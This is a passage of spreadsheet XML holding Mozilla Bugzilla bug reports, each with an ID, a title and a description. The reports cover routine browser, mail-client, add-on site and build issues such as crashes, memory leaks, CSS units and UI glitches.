Mozilla1.8.0-l10n-de
Mozilla1.8.0-l10n-el
Mozilla1.8.0-l10n-en-GB
Mozilla1.8.0-l10n-es-AR
Mozilla1.8.0-l10n-es-ES
Mozilla1.8.0-l10n-eu
Mozilla1.8.0-l10n-fi
Mozilla1.8.0-l10n-fr
Mozilla1.8.0-l10n-fy-NL
Mozilla1.8.0-l10n-ga-IE
Mozilla1.8.0-l10n-gu-IN
Mozilla1.8.0-l10n-he
Mozilla1.8.0-l10n-hu
Mozilla1.8.0-l10n-hy-AM
Mozilla1.8.0-l10n-it
Mozilla1.8.0-l10n-ja
Mozilla1.8.0-l10n-ja-JP-mac
Mozilla1.8.0-l10n-ko
Mozilla1.8.0-l10n-lt
Mozilla1.8.0-l10n-mk
Mozilla1.8.0-l10n-mn
Mozilla1.8.0-l10n-nb-NO
Mozilla1.8.0-l10n-nl
Mozilla1.8.0-l10n-nn-NO
Mozilla1.8.0-l10n-pa-IN
Mozilla1.8.0-l10n-pl
Mozilla1.8.0-l10n-pt-BR
Mozilla1.8.0-l10n-ro
Mozilla1.8.0-l10n-ru
Mozilla1.8.0-l10n-sk
Mozilla1.8.0-l10n-sl
Mozilla1.8.0-l10n-sq
Mozilla1.8.0-l10n-sv-SE
Mozilla1.8.0-l10n-tr
Mozilla1.8.0-l10n-zh-CN
Mozilla1.8.0-l10n-zh-TW
Mozilla1.8.0-SeaMonkey</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-375809</t>
  </si>
  <si>
    <t>Rates were not updated accordingly to rating scale modification</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 XPCOMViewer/0.9.5
Build Identifier: 
With the new version of the add-ons website rating scale is now 0-10.
It used to be 0-5 so rates should have been doubled when the site was upgraded.
An add-on with the excellent rate of 5/5 is now just at the average rate of 5/10 !
Reproducible: Always
Steps to Reproduce:
1. login as developper
2. check the rate of your add-on
3.
Actual Results:  
the rate has the same value it had before the site upgrade
Expected Results:  
the rate should be twice as much to reflect the new rate scale</t>
  </si>
  <si>
    <t>MOZILLA.ORG-288019</t>
  </si>
  <si>
    <t>Mirroring instructions don't mention how much disk space is required</t>
  </si>
  <si>
    <t>The mirroring instructions don't mention how much disk space is required for the
mirror.  They probably should.  Are we ready to advertise the micro-mirror? 
That's probably be a good place to mention that too.</t>
  </si>
  <si>
    <t>JSS-172695</t>
  </si>
  <si>
    <t>update docs for JSS 3.3</t>
  </si>
  <si>
    <t>Update the documentation for JSS 3.3. Specifically add the JCA Cipher and
Keystore classes.</t>
  </si>
  <si>
    <t>CORE-230651</t>
  </si>
  <si>
    <t>don't create new rule processors when enabling/disabling a style sheet</t>
  </si>
  <si>
    <t>We can eliminate the style set clearing its rule processors array (and
subsequent creation of new rule processors) for enabling/disabling style sheets
by calling ClearRuleCascades() from CSSStyleSheetImpl::SetEnabled().</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-259469</t>
  </si>
  <si>
    <t>RSS feed discovery link in header should use application/rdf+xml type</t>
  </si>
  <si>
    <t>On the front page of http://www.mozilla.org/ the RSS news feed is advertised
with a discovery tag of the following:
 &lt;link rel=alternate type=application/xml title=RSS
href=http://www.mozilla.org/news.rdf&gt;
But according to this page the correct type should be application/rss+xml
since application/xml is too generic:
http://diveintomark.org/archives/2002/06/02/important_change_to_the_link_tag</t>
  </si>
  <si>
    <t>CORE-277234</t>
  </si>
  <si>
    <t>[FIXr]crash [@ nsSynthMouseMoveEvent::HandleEvent]</t>
  </si>
  <si>
    <t>While running the Tdhtml test in a debug build I hit a crash inside the View
Manager.  Here's the stack:
nsCOMPtr::assign_assuming_AddRef(nsIEventQueue * 0x00000000) line
568 + 3 bytes
nsCOMPtr::assign_with_AddRef(nsISupports * 0x00000000) line 1225
nsCOMPtr::operator=(nsIEventQueue * 0x00000000) line 714
nsViewManager::ProcessSynthMouseMoveEvent(int 0) line 4253
nsSynthMouseMoveEvent::HandleEvent() line 4199
HandlePLEvent(PLEvent * 0x0348f6dc) line 367
PL_HandleEvent(PLEvent * 0x0348f6dc) line 698 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x00ef5e68) line 633 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x00080488 unsigned int 49461 unsigned int 0
long 15687272) line 1472 + 9 bytes
USER32! 77d43a50()
USER32! 77d43b1f()
USER32! 77d43d79()
USER32! 77d43ddf()
nsAppStartup::Run(nsAppStartup * const 0x00f02da8) line 147
xre_main(int 3 char * * 0x003e77d8 const nsXREAppData * 0x0041e01c kAppData)
line 2140 + 35 bytes
main(int 3 char * * 0x003e77d8) line 60 + 18 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e814c7()
It looks like the value of mSynthMouseMoveEventQueue is 0xdddddddd and we crash
trying to call nsISupports::Release on it.</t>
  </si>
  <si>
    <t>FIREFOX-482941</t>
  </si>
  <si>
    <t>'View Background Image' context-menu item is always greyed out</t>
  </si>
  <si>
    <t>STR:
1. load http://www.mozilla.com/en-US/
2. right click somewhere on the big background image
ER: context menu item 'View Background Image' is active
AR: 'View Background Image' is greyed out.
Additionally: the background images don't show up in the media tab of the page info window
Works
http://hg.mozilla.org/mozilla-central/rev/d9d4bf676f65
Gecko/20090219 Minefield/3.2a1pre
Fails
http://hg.mozilla.org/mozilla-central/rev/35d78a340566
Gecko/20090220 Minefield/3.2a1pre
http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=d9d4bf676f65&amp;tochange=35d78a340566
Possibly bug 322475 ? (in which case this probably should be a core bug)</t>
  </si>
  <si>
    <t>THUNDERBIRD-534695</t>
  </si>
  <si>
    <t>Prompted for password multiple times once for each open tab</t>
  </si>
  <si>
    <t>The problem is that if you have say 8 tabs open for for mailboxes on the same IMAP account when you launch Thunderbird you will be prompted for the password 8 times once for each open tab.
To reproduce:
- Removed saved password from Password Manager
- Open 8 tabs for mailboxes from the same account
- Quit / Relaunch Thunderbird
- Note you are prompted for the password for the account 8 times once for each open tab.
Thunderbird should realize you entered the password for the first tab and use that password.</t>
  </si>
  <si>
    <t>SEAMONKEY-244834</t>
  </si>
  <si>
    <t>Table width changes in table properties are not applied</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040514
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040514
When changing the width of a table in the Table Properties the changes are not
applied to the table
Reproducible: Always
Steps to Reproduce:
1. Create a table and select it
2. Go to Table -&gt; Table Properties
3. Change Widtg
Actual Results:  
Nothing.
Expected Results:  
Table width should have changed accordingly.</t>
  </si>
  <si>
    <t>CORE-381888</t>
  </si>
  <si>
    <t>Caret tracking broken with Windows screen readers [Cairo-related]</t>
  </si>
  <si>
    <t>Window-Eyes cannot track the caret in Firefox 3. As you arrow through text (e.g .the location bar) it reads incorrect characters or none at all. JAWS usually works fine but I have heard some reports that is having some problems in Firefox 3 text fields.
1.  You can see the problem in any Firefox 3 build (e.g. http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/) 
2.  It broke for the first time in the Firefox 2/23/2006 build. It appears to be the introduction of Cairo. However I have not been able to find the exact lines of code in Firefox that caused the problem. 
3. Sometimes it seems to report a character that's several character positions away or the same character several times in a row 
We could ask Window-Eyes and JAWS to update their code to either use caret move events with IAccessibleText or to adapt to our new caret drawing code but that would not help users with current versions of those screen readers.
It would be better to try and fix Firefox.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-379422</t>
  </si>
  <si>
    <t>Trusted add-ons don't appear in the updated list</t>
  </si>
  <si>
    <t>I uploaded a new version of Adblock Plus today and it was public immediately because the add-on is trusted. From what I remember the updated add-ons list uses the date when the add-on was made public for sorting - I guess this date should be changed when uploading a new version of a trusted add-on.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-498313</t>
  </si>
  <si>
    <t>UseOfCaptureEventsWarning string: docs URL is 404</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X it rv:1.8.1.21) Gecko/20090327 Camino/1.6.7 (MultiLang) (like Firefox/2.0.0.21pre)
Build Identifier: Camino 2.0b3
http://developer.mozilla.org/en/docs/DOM:element.addEventListener is 404
The right one is https://developer.mozilla.org/en/DOM/element.addEventListener
Reproducible: Always</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-401916</t>
  </si>
  <si>
    <t>Need way of knowing which staging copies are not same as live copy</t>
  </si>
  <si>
    <t>Right now if an edit to a staging copy is approved the staging copy is still around. We would like to keep that staging copy in existence because it may contain comments as well. This means that viewing all articles in the staging area is no longer a good way of seeing which edits are in need of review.
We need a way of know if an article is not in sync with the live version and way of displaying a list of articles that are not in sync.</t>
  </si>
  <si>
    <t>CORE-84582</t>
  </si>
  <si>
    <t>[FIX]Stylesheet loading blocks parser</t>
  </si>
  <si>
    <t>When the style system hits a stylesheet it blocks the parser and content sink.
This is Bad (tm).
What we should do is asynchronously download and parse the stylesheet but with
frame creation supressed for a certain amount of time (hidden-pref configurable
an initial value of a few seconds 6s maybe would be good).
See:
http://www.bath.ac.uk/~py8ieh/internet/importtest/extra/nestedstylesheets.html
http://www.bath.ac.uk/~py8ieh/internet/importtest/extra/infinite-persistent.html
http://www.bath.ac.uk/~py8ieh/internet/importtest/extra/infinite-alternate.html
http://www.bath.ac.uk/~py8ieh/internet/importtest/extra/infinite-import.html</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-371153</t>
  </si>
  <si>
    <t>Calculate mkdepend dependencies by hand</t>
  </si>
  <si>
    <t>When mkdepend headers change it isn't rebuilt (because we can't calculate dependencies for it because mkdepend isn't built yet). We should calculate the dependencies by hand.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-253068</t>
  </si>
  <si>
    <t>Help Doc on Cookies needs to be updated</t>
  </si>
  <si>
    <t>Enable Cookies has been renamed to Allow sites to set cookies.
Instead of the Accept cookies normally Accept for current session only and
Ask for each cookie radiobuttons there's now a Keep Cookies menulist
containing the items until they expire until I close Firefox and ask me
every time.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-118306</t>
  </si>
  <si>
    <t>NS_THEME_TAB and NS_THEME_TAB_PANEL implementations (GTK)</t>
  </si>
  <si>
    <t>This covers the implementation of NS_THEME_TAB and NS_THEME_TAB_PANEL for XUL
tab panels on GTK.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-427944</t>
  </si>
  <si>
    <t>window.onbeforeunload not being called</t>
  </si>
  <si>
    <t>Our javascript app expects window.onbeforeunload callback when prism window is closed.  We need this to prompt user to save unsaved work.  This works in FF2/FF3 just fine but not in Prism.</t>
  </si>
  <si>
    <t>jjzhuang</t>
  </si>
  <si>
    <t>CORE-463209</t>
  </si>
  <si>
    <t>No sound when message box is opened (alert/confirm/prompt/etc..)</t>
  </si>
  <si>
    <t>Created attachment 346450
Patch v1.0
When each message box is opened on Windows the system sound is not played. We should play the sound.
# I searched this bug but I couldn't find this bug... But it's strange...
The attached patch fixes only on Windows. I'm not sure the sounds are needed on other platforms too and how to implement it.</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-905946</t>
  </si>
  <si>
    <t>Gaia::Keyboard</t>
  </si>
  <si>
    <t>Inconsistent way of cancelling an autocorrection in case of auto fixing punctuation</t>
  </si>
  <si>
    <t>marina.rodrigueziglesias</t>
  </si>
  <si>
    <t>CORE-396820</t>
  </si>
  <si>
    <t>remove menu listener usage from cocoa widget nsIWidgets</t>
  </si>
  <si>
    <t>Created attachment 281577
fix v1.0
We don't use menu listeners for anything in Cocoa widgets. It is just overhead in our event handling and complicates the code.</t>
  </si>
  <si>
    <t>CORE-213692</t>
  </si>
  <si>
    <t>PREF_CopyCharPref uses the wrong allocator</t>
  </si>
  <si>
    <t>242 // These functions are similar to the above Get version with the significant
243 // difference that the preference module will alloc the memory (e.g.
XP_STRDUP) and
244 // the caller will need to be responsible for freeing it...
245 // 
246 */
247 PrefResult PREF_CopyCharPref(const char *pref char ** return_buf PRBool
isDefault)
679 PREF_CopyCharPref(const char *pref_name char ** return_buffer PRBool
get_default)
680 {
...
698             *return_buffer = PL_strdup(stringVal)
....
703 }
*
Referenced (in 3 files total) in:
    * modules/libpref/src/nsPrefBranch.cpp:
          o View change log or Blame annotations line 212
          o line 834
          o line 945 
Is the only consumer (Bug 213691 covers mozilla's bad paste job)
943 NS_IMETHODIMP nsPrefBranch::SecurityGetCharPref(const char *pref char **
return_buf)
944 {
945   return _convertRes(PREF_CopyCharPref(getPrefName(pref) return_buf
PR_FALSE))
946 }
Note that the caller is an xpcom method and its out param should use the xpcom
allocator which is not compatible w/ pl_strdupn</t>
  </si>
  <si>
    <t>CORE-176985</t>
  </si>
  <si>
    <t>nsHTMLDocument::SetDomain() can leak an nsIURI</t>
  </si>
  <si>
    <t>nsHTMLDocument::SetDomain() uses a raw pointer to a newly created nsIURI and 
doesnt care to release when it is done. This results in a small leak. 
Trivial fix is coming up.</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-482982</t>
  </si>
  <si>
    <t>Finding the revision that introduced a change is well-nigh impossible</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
1) Load https://developer.mozilla.org/En/NsIAutoCompleteSearch
2) See the text that says Can be null in bold under previousResult.
3) Decide you want to figure out who added that text and what else they changed
   in that edit.
4) Curse the lack of an annotation functionality.
5) Click history.
6) Decide to do a binary search on revisions to see when the text first
   appeared.
7) Select the oldest version and the third-oldest one (the latter at 16:23 on
   2008-05-12) and compare.
8) See that the text is not there.
9) Hit the browser back button.
ACTUAL RESULTS: You discover that the compare radio buttons are no longer in the state you set them to so you lose your place in the search.  Cry and give up.
EXPECTED RESULTS: Not reset your radio buttons so that you can keep searching through the list without losing your place until you find what you want.</t>
  </si>
  <si>
    <t>THUNDERBIRD-470689</t>
  </si>
  <si>
    <t>switching tabs doesn't update toolbarbutton states</t>
  </si>
  <si>
    <t>1. Take a look at Local Folders: Selecting Outbox will cause the Delete toolbar button to deactivate. Now create a new folder sub0 under Local Folders: selecting it will activate the Delete toolbar button.
2. Open Local Folders/Outbox and Local Folders/sub0 in different tabs.
3. Switch between these two tabs and see the Delete toolbar button not change state.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-496075</t>
  </si>
  <si>
    <t>Collection tracking for add-on details pages</t>
  </si>
  <si>
    <t>This isn't necessary for 5.0.6 but for 5.0.7 we should have collection tracking for add-on display pages and subsequent downloads too.
So if someone goes to an add-on's display page from a collection view it should pass the collection_id and that id should then be applied to the install button on that page too.</t>
  </si>
  <si>
    <t>CORE-494994</t>
  </si>
  <si>
    <t>optimized JS shell should be built with -O3</t>
  </si>
  <si>
    <t>CORE-426163</t>
  </si>
  <si>
    <t>MFBT</t>
  </si>
  <si>
    <t>MOZ_CRASH needs to use TerminateProcess instead of exit</t>
  </si>
  <si>
    <t>Created attachment 312703
change exit method
as suggested</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-423706</t>
  </si>
  <si>
    <t>Parser generates ListExpr in many cases when it shouldn't</t>
  </si>
  <si>
    <t>This returns false as it should:
  delete Boolean.prototype
This returns true:
  delete (Boolean.prototype)</t>
  </si>
  <si>
    <t>CORE-827684</t>
  </si>
  <si>
    <t>Memory leak of OmxDecoder if Init fails on Android</t>
  </si>
  <si>
    <t>media/omx-plugin/OmxPlugin.cpp has the following in CreateDecoder:
  OmxDecoder *omx = new OmxDecoder(aPluginHost aDecoder)
  if (!omx || !omx-&gt;Init())
    return false
This will leak an instance of OmxDecoder if the allocation is successful but the Init call is not.</t>
  </si>
  <si>
    <t>CORE-282126</t>
  </si>
  <si>
    <t>Fix support for the 'ch' length unit to match spec (fallback for no '0' glyph vertical metrics)</t>
  </si>
  <si>
    <t>What to do about the 'ch' length unit? (Mozilla vendor specific)
(Followup from bug 281972)
The only real internal dependence is:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/content/html/content/src/nsHTMLPreElement.cpp&amp;rev=1.63&amp;root=/cvsroot&amp;mark=127145146#125
That is to wrap a  exactly at the number of characters specified by
WIDTH (or COLS) we need a unit that is based on the width of a character
in the current font.
The problem is that all the relative widths that are font based are
relative the height not the width:
http://www.w3.org/TR/CSS21/syndata.html#length-units
http://www.w3.org/TR/2001/WD-css3-values-20010713/#lengths
So to get rid of this Mozilla vendor unit I see two options.
1. convince the CSS working group that 'ch' is needed
2. remove it and introduce a nsPreFrame that looks at the
   WIDTH/COLS attr to set its width during reflow (similar to what
   nsTextControlFrame does).
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/layout/forms/nsTextControlFrame.cpp&amp;rev=3.191&amp;root=/cvsroot&amp;mark=158316061607#1582
http://lxr.mozilla.org/mozilla/search?string=eStyleUnit_Chars
http://lxr.mozilla.org/mozilla/search?string=eCSSUnit_Char
http://lxr.mozilla.org/mozilla/search?string=eCSSKeyword_ch</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-510742</t>
  </si>
  <si>
    <t>Add Camino 1.6.9 to bouncer</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #485715 +++
We'll be releasing Camino 1.6.9 in the next week (to correspond with the Thunderbird release) and would like 1.6.9 to be added to bouncer.
Camino 1.6.9 en-US will be http://releases.mozilla.org/pub/mozilla.org/camino/releases/en-US/Camino-1.6.9.dmg .
Camino 1.6.9 multilingual will be http://releases.mozilla.org/pub/mozilla.org/camino/releases/all/Camino-1.6.9.dmg .</t>
  </si>
  <si>
    <t>SEAMONKEY-159137</t>
  </si>
  <si>
    <t>silly font defaults on BeOS</t>
  </si>
  <si>
    <t>on BeOS all fonts default to Baskerville so even writing the CSS keyworks will give you this for (which belongs to the 'serif' group.</t>
  </si>
  <si>
    <t>bugzilla_kl</t>
  </si>
  <si>
    <t>CORE-472195</t>
  </si>
  <si>
    <t>support css3 root em ('rem' or 're') units</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5
Build Identifier: 
CSS3 defines rem -- root em -- units as the font size of the root element. This will be very useful for style sheet authors. I have a patch implementing rem units I'll attach it momentarily.
Reproducible: Always</t>
  </si>
  <si>
    <t>kr</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-198100</t>
  </si>
  <si>
    <t>Option to change precedences (order) of junk control and normal filters</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
I've got my Junk mail filter trained enough that it is starting to recognize
that certain mail coming in is junk however I've discovered a problem with the
way the filters interact. I have filters on each of my email accounts that
forward all emails to a folder in Local Folders called Composite Inbox. I have
also set up filters on each of my email accounts that send mail marked as junk
to the Junk folder in Local Folders.
Now the problem begins. It seems that the filter to send all email to the
Composite Inbox runs before the junk mail filter and that the junk mail filter
is not intelligent enough to move emails from my Composite Inbox to the Junk
folder. I also discovered that it seems impossible to create filters for
anything under Local Folders otherwise I'd try to manually move these emails
based on their junk status. There also does not appear to be a way to defer the
running of my inbox filters until after the junk mail filter has been run on
incoming emails or to add Local Folders to the filtering process.
My suggested fixes for this issue are:
1. Implement mail filters on local folders.
2. Allow ordering of normal filters versus junk mail filters so that an end user
can decide to filter junk mail first and then run the rest through a standard
user-defined filter.
Reproducible: Always
Steps to Reproduce:
1. Create filter on an account inbox that forwards all email to a given folder
in Local Folders (my filter is all emails after Jan 1st 1969).
2. Train junk controls to recognize emails and set option to automatically move
mail to trash.
3. Send a known junk email to the account. 
Actual Results:  
The email is flagged properly as junk but was not be deleted and appears in the
given Local Folders folder.
Expected Results:  
Sent the email to the selected trash folder.</t>
  </si>
  <si>
    <t>straxus</t>
  </si>
  <si>
    <t>FIREFOX-526454</t>
  </si>
  <si>
    <t>Link to plugin check page from about:plugins</t>
  </si>
  <si>
    <t>It would be nice if there was a link to the new plugin check page from the about:plugins page</t>
  </si>
  <si>
    <t>wesongathedeveloper</t>
  </si>
  <si>
    <t>MOZILLA_LABS-513143</t>
  </si>
  <si>
    <t>When using the width property status bars can often have a lot of white space</t>
  </si>
  <si>
    <t>Try this code out:
jetpack.statusBar.append({
  html:hi
  width: 50
})
Notice that there is a lot of ugly ugly white (not that I'm saying white is ugly in general just in this case).
This has been cropping up in a number of places and so would be good to fix.</t>
  </si>
  <si>
    <t>NSS-144605</t>
  </si>
  <si>
    <t>CAC card problem (PSM bug 143181)</t>
  </si>
  <si>
    <t>This is the NSS bug for the PSM bug 143181
I'd like this to be fixed for 3.5.</t>
  </si>
  <si>
    <t>THUNDERBIRD-466674</t>
  </si>
  <si>
    <t>default action should be to send out html + plaintext w/o asking</t>
  </si>
  <si>
    <t>Created attachment 349987
html default action patch ( all-thunderbird override )
We should be sending out both HTML + Plaintext as the default sending option without asking.  Currently our default action for sending mail is to ask the person How lucky do you feel?  This dialog doesn't make much sense to a majority of users the rest of the users who do understand should be able to find the preference to do what they want.
Currently the preference for sending HTML is turned on by default for Email and off by default for Newsgroups.  Therefore the effective change here is that email users won't see one less dialog while sending an email.
If newsgroup sending is somehow effected by this we should likely file a separate bug.  If for newsgroups we want to make this pref a per account pref that could be a possible future solution.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-468685</t>
  </si>
  <si>
    <t>Desktop UI improvements/fixes</t>
  </si>
  <si>
    <t>Tracking bug for UI improvements and fixes for the desktop (Firefox) flavor of Weave.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-490544</t>
  </si>
  <si>
    <t>corp01.sj.mozilla.com is on a spam blacklist</t>
  </si>
  <si>
    <t>jst tried sending me e-mail today and it got bounced by MIT's mail server with:
     Host M24-004-BARRACUDA-1.mit.edu[18.7.7.111] said: 554
     Service unavailable Client host [corp01.sj.mozilla.com] blocked using
     Barracuda Reputation
     http://bbl.barracudacentral.com/q.cgi?ip=63.245.208.141 (in reply to RCPT
     TO command)
I went to that url and put in a request to remove from the blacklist but I couldn't give a reason past I don't think it should be on the list and I have no idea whether the box is in fact doing anything weird...  Might be good to put in a request with contact info for someone who might actually know what's going on.</t>
  </si>
  <si>
    <t>TESTOPIA-360661</t>
  </si>
  <si>
    <t>Can't upload attachments</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 SBS .NET CLR 1.0.3705 .NET CLR 1.1.4322 .NET CLR 2.0.50727)
Build Identifier: http://landfill.bugzilla.org/testopia/testopia-1.0-RC1.tar.gz
When I try to upload a attachment (to a testplan or a testcase) testopia gives me an error.
Can't find param named convert_uncompressed_images at Bugzilla/Config.pm line 151  chunk 1.
Reproducible: Always
Steps to Reproduce:
1. Navigate to a testplan
2. Choose a file for an attachment
3. Enter a description
4. Click Attach
Actual Results:  
Content-type: text/html 
Software error:
Can't find param named convert_uncompressed_images at Bugzilla/Config.pm line 151  chunk 1.
For help please send mail to the webmaster (you@example.com) giving this error message and the time and date of the error. 
Expected Results:  
It should have uploaded the file
Both installations of Testopia 1.0-beta and Bugzilla 2.20.3 were done without any errors.
I am using Perl 5.6.2 with all needed modules.
Checking perl modules ...
Checking for       AppConfig (v1.52)   ok: found v1.63
Checking for             CGI (v2.93)   ok: found v3.25
Checking for    Data::Dumper (any)     ok: found v2.121
Checking for    Date::Format (v2.21)   ok: found v2.22
Checking for             DBI (v1.38)   ok: found v1.53
Checking for      File::Spec (v0.84)   ok: found v3.23
Checking for      File::Temp (any)     ok: found v0.14
Checking for        Template (v2.08)   ok: found v2.15
Checking for      Text::Wrap (v2001.0131) ok: found v2001.0131
Checking for    Mail::Mailer (v1.65)   ok: found v1.74
Checking for        Storable (any)     ok: found v2.15
The following Perl modules are optional:
Checking for              GD (v1.20)   ok: found v2.35
Checking for Template::Plugin::GD::Image (any)     ok: found v1.56
Checking for     Chart::Base (v1.0)    ok: found v2.3
Checking for     XML::Parser (any)     ok: found v2.34
Checking for       GD::Graph (any)     ok: found v1.4308
Checking for GD::Text::Align (any)     ok: found v1.18
Checking for     PatchReader (v0.9.4)  ok: found v0.9.5
Checking for    HTML::Parser (any)     ok: found v3.55
Checking for  HTML::Scrubber (any)     ok: found v0.08</t>
  </si>
  <si>
    <t>CORE-50051</t>
  </si>
  <si>
    <t>Setting foreground color then typing doesn't change text color</t>
  </si>
  <si>
    <t>If I change the foreground color using the toolbar wiget then type the new text 
does not come out using the new color. It's a if the type-in state is not getting 
the current color.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-521160</t>
  </si>
  <si>
    <t>backup/snapshot of ref image VMs and mac ref images</t>
  </si>
  <si>
    <t>...so if we make a mistake and mess up our ref images we can revert back to previous known working ref images?
(I ask because we recently hit a problem where a change we made to the ref images looked like it was causing a problem and we wanted to see if we could reproduce the problem with the previous version. If necessary we could also have used the backup to revert the last change to the ref images.)</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-445029</t>
  </si>
  <si>
    <t>Make several MathML webpages validate (with no errors)</t>
  </si>
  <si>
    <t>Xhtml webpages from MathML directory which do not pass validation:
http://www.mozilla.org/projects/mathml/start.xhtml (22 errors)
http://www.mozilla.org/projects/mathml/start-hebrew.xhtml (23 errors)
http://www.mozilla.org/projects/mathml/start-thai.xhtml (22 errors)
http://www.mozilla.org/projects/mathml/demo/basics.xhtml (39 errors)
http://www.mozilla.org/projects/mathml/demo/mfrac.xhtml (20 errors)
http://www.mozilla.org/projects/mathml/demo/mo.xhtml (24 errors)
http://www.mozilla.org/projects/mathml/demo/mtable.xhtml (21 errors)
http://www.mozilla.org/projects/mathml/demo/mspace.xhtml (21 errors)
http://www.mozilla.org/projects/mathml/demo/mmultiscripts.xhtml (20 errors)
http://www.mozilla.org/projects/mathml/demo/roots.xhtml (20 errors)
http://www.mozilla.org/projects/mathml/demo/extras.xhtml (41 errors with W3C
validator)</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-473787</t>
  </si>
  <si>
    <t>Create special user projects that allows us to store config files commands and more</t>
  </si>
  <si>
    <t>Each user should have a special project that only they can see (future: would actually be nice to allow it to be shared)
Can either do the special hash thing or a magic directory such as:
/file/at/user/dion/foo
where user == a special project name.
With this functionality we will be able to save commands up there.</t>
  </si>
  <si>
    <t>CORE-386752</t>
  </si>
  <si>
    <t>Floated images in  disappear when a background color is used</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a7pre) Gecko/2007070305 SeaMonkey/2.0a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a7pre) Gecko/2007070305 SeaMonkey/2.0a1pre
If no background color is specified for  then any floated image will be visible. However when a background color is specified for  a floated image is invisible though the space it should be using is still apparent. Non-floated images are not affected by a background color.
Reproducible: Always
Steps to Reproduce:
1.Look at attached file for examples.
2.
3.
Actual Results:  
Floated images are invisible when a background color is specified for .
Expected Results:  
Floated images should remain visible when a background color is specified for .</t>
  </si>
  <si>
    <t>base12</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-428060</t>
  </si>
  <si>
    <t>Testcases needed query is not complete</t>
  </si>
  <si>
    <t>Not sure who constructed the query but there are more than 78 testcases need for Litmus. If you add all the other products there are 305 needed. I have shared my in-Litmus? query in bugzilla and that would probably be a better list to go off of since it includes all the areas besides Firefox (Toolkit etc)</t>
  </si>
  <si>
    <t>CORE-17050</t>
  </si>
  <si>
    <t>'' in unintended location in jsexn.c? function--Exception()</t>
  </si>
  <si>
    <t>line 293 of jsexn.c results in a compiler warning on Macintosh.
It flags the '' at the end of the if
is the '' intentional?
if so the compiler won't complain if it is enclosed in {} or on a separate line.
based on the current code maybe the 'if' should be removed?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-174994</t>
  </si>
  <si>
    <t>ynetcenter.co.il (luach.ynet.co.il) - site terribly broken</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.1) Gecko/20020826
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.1) Gecko/20020826
site is throwing mozilla to http://www.ynetcenter.co.il/BrowsPopUp.htm .
the site is an online classified adds site run by the Yedioth media
conglomerate which also runs ynet.co.il responsible for another evangelism
bug. provides info in education real estate jobs vehicles and services.
Reproducible: Always
Steps to Reproduce:
1.go to http://www.ynetcenter.co.il/
2.viola</t>
  </si>
  <si>
    <t>hebrew</t>
  </si>
  <si>
    <t>SEAMONKEY-254564</t>
  </si>
  <si>
    <t>Buddy icons not shown</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040805 Firefox/0.9.3
Build Identifier: Mozilla Thunderbird 0.7.2 (X11/20040716)
Mailnews/Thunderbird should display buddy icons as described in
http://www.mozilla.org/mailnews/arch/buddyicons.html i.e. they should show uop
in message view (headers expanded) and card view (addressbook).
Alas nothing is shown.
Reproducible: Always
Steps to Reproduce:
1. Set up buddy icons (icons and addressbook card) as per
http://www.mozilla.org/mailnews/arch/buddyicons.html
2. Call up message view (expanded) or address card.
3. 
Actual Results:  
No buddy icons are visible. No visual difference to the case without buddy icons.
Expected Results:  
Display buddy icons.
Same in cvs.</t>
  </si>
  <si>
